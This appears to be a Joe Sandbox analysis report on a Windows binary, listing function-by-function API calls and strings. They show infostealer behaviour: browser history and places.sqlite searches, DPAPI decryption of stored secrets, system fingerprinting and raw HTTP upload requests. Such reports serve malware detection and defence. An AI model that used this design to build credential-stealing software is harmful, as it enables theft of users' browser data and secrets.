Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19

Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18

Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8

Strings

\*.*, xrefs: 0041308F
.txt, xrefs: 004131AE
\places.sqlite, xrefs: 00413144

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\places.sqlite
API String ID: 1974802433-3919338718
Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18

Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F

Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 00411216
.txt, xrefs: 00411355, 00411444

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58

Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18

Function 00411590 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58

Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
LocalFree.KERNEL32(?), ref: 0040950A

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A

Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698

Function 0040A4A4 Relevance: 1.5, APIs: 1, Instructions: 16comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE

Function 00407A34 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 0040831C Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 323libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59

Function 00408324 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 319libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59

Function 00408328 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 317libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59

Function 00418124 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279

Strings

, xrefs: 004183FE
, xrefs: 004184B6
wsock32.dll, xrefs: 0041819D
User-agent: , xrefs: 004183AA
HTTP/1.0, xrefs: 00418393
Connection: close, xrefs: 004183A5
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 004183AF
Content-Length: , xrefs: 004183B9
Host: , xrefs: 00418398

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 384173800-3355491746
Opcode ID: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
Opcode Fuzzy Hash: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58

Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
, xrefs: 004172E5, 00417472, 00417490
Zone: , xrefs: 00417462
LocalTime: , xrefs: 0041743F
Windows : , xrefs: 004172F8
[Soft], xrefs: 004174D4
EXE_PATH : , xrefs: 004172D3
Computer(Username) : , xrefs: 00417364
Screen: , xrefs: 004173BD
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19

Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

